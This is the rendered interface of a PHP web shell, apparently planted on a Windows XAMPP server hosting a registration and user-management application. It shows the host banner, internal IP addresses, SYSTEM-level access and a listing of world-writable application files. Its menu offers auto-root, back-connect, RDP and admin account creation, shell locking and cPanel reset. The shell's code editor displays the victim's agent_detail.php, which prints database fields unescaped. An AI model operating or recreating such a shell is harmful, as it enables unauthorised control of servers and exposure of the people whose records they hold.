Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
htdocs /
edgpens /
utility /
[ HOME SHELL ]
Name
Size
Permission
Action
agent.php
22.3
KB
-rw-rw-rw-
agent_detail.php
4.55
KB
-rw-rw-rw-
change_pass.php
11.65
KB
-rw-rw-rw-
declarationPage.php
18
KB
-rw-rw-rw-
email_setting.php
15.11
KB
-rw-rw-rw-
lawPage.php
17.76
KB
-rw-rw-rw-
menu_access.php
13.14
KB
-rw-rw-rw-
newsPage.php
17.76
KB
-rw-rw-rw-
repDaily.php
2.31
KB
-rw-rw-rw-
send_mail.php
10.15
KB
-rw-rw-rw-
send_sms.php
7.32
KB
-rw-rw-rw-
sms_setting.php
11.83
KB
-rw-rw-rw-
userList.php
29.25
KB
-rw-rw-rw-
userList_200422.php
19.69
KB
-rw-rw-rw-
userList_200423.php
18.53
KB
-rw-rw-rw-
userList_200630.php
19.67
KB
-rw-rw-rw-
userList_230312.php
27.34
KB
-rw-rw-rw-
userRole.php
10.22
KB
-rw-rw-rw-
userRole_230312.php
10.19
KB
-rw-rw-rw-
web_setting.php
17.71
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : agent_detail.php
<style type="text/css"> .auto-form .form-control{ height: auto; border:none; } </style> <!-- <div class="row" style="position: relative;top:20px"> --> <!-- <div class="col-sm-12"> --> <!-- <div class="block"> --> <!-- Login Title --> <!-- <div class="block-title"> --> <!-- <h2>Registration</h2> --> <!-- </div> --> <!-- <form class="push form-horizontal" id="form-validation" action="index.php?page=utility/userList" method="post"> --> <hr> <!-- <form class="push form-horizontal" id="form-validation" method="post" enctype="multipart/form-data" autocomplete="off"> --> <?php include '../odbc.php'; $sql = "SELECT a.*, b.nama, b.company_cert, b.company_no, b.alamat, b.noTel, b.noFax FROM user_register a LEFT JOIN kod_syarikattemp b ON b.idSyarikat=a.idSyarikat WHERE a.idUser=?"; $param_data = array("idUser" => $_GET['ii']); $datax = mysqli_prepare_all($sql,$param_type = "auto",$param_data); $fetch_datax = $datax->fetch_assoc(); ?> <div class="row auto-form"> <div class="col-md-6"> <div class="row"> <div class="col-sm-12 col-md-8 col-md-offset-4"> <strong class="text-primary">PROFILE</strong> <hr style="margin :5px 0px;border-top: 5px double #eee"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-user">Email</label> <div class="col-md-8"> <p class="form-control"><?php echo $fetch_datax['emailUser'];?></p> </div> </div> <hr> <div class="form-group"> <label class="col-md-4 control-label" for="val-name">Name</label> <div class="col-md-8"> <p class="form-control"><?php echo strtoupper($fetch_datax['nameUser']);?></p> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-mobile">Mobile Number</label> <div class="col-md-8"> <p class="form-control"><?php echo $fetch_datax['mobileNo'];?></p> </div> </div> </div> <div class="col-md-6"> <div class="row"> <div class="col-sm-12 col-md-8 col-md-offset-4"> <strong class="text-primary">COMPANY</strong> <hr style="margin :5px 0px;border-top: 5px double #eee"> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-cname">Name</label> <div class="col-md-8"> <p class="form-control"><?php echo strtoupper($fetch_datax['nama']);?></p> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-creg">Registration No.</label> <div class="col-md-8"> <p class="form-control"><?php echo $fetch_datax['company_no'];?></p> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-fail">Company Certificate</label> <div class="col-md-8"> <!-- <p class="form-control"> --> <?php if(!empty($fetch_datax['company_cert'])){ ?> <a href="<?php echo "upload/syarikat_temp/{$fetch_datax['company_cert']}";?>" target="_blank" class="up2 form-control issc_file" style="cursor: pointer;border:1px solid #eee"> Click To Open<i class="fa fa-download pull-right" style="line-height: 1.42857143"></i> </a> <?php }else{ echo "<div class='form-control'><i class='text-danger'>No Document Attach</i></div>";}?> <!-- </p> --> </div> </div> <hr> <div class="form-group"> <label class="col-md-4 control-label" for="val-calamat">Address</label> <div class="col-md-8"> <p class="form-control"><?php echo nl2br($fetch_datax['alamat']);?></p> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-ctel">Phone Number</label> <div class="col-md-6"> <p class="form-control"><?php echo $fetch_datax['noTel'];?></p> </div> </div> <div class="form-group"> <label class="col-md-4 control-label" for="val-cfax">Fax Number</label> <div class="col-md-6"> <p class="form-control"><?php echo $fetch_datax['noFax'];?></p> </div> </div> </div> </div> <!-- </form> --> <!-- </div> --> <!-- </div> --> <!-- </div> -->
Close